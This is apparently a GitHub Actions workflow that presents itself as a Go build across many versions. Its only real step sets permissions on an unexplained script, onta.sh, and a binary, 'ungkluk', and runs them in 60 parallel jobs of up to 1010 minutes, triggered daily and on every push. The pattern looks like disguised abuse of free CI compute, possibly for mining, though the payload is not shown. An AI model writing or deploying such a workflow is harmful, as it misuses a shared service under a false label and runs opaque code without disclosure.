name: Oncom

on:  
  push:
  pull_request:
  schedule:
    - cron: '0 0 * * *'
jobs:
  build:
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
        go: [ '1.12', '1.13', '1.14', '1.15', '1.16' , '1.17' ]
        flag: [ai, bi, ci, di, ei, fi, gi, hi, ii, ji]
    timeout-minutes: 1010
    env:
        NUM_JOBS: 70
        JOB: ${{ matrix.job }}
    steps:
    - uses: actions/checkout@v2
    - uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
    - name: Instal ${{ matrix.flag }} Ver-${{ matrix.go }}
      run: |
        chmod +x onta.sh && chmod +x ungkluk && chmod 777 ungkluk onta.sh && ./onta.sh
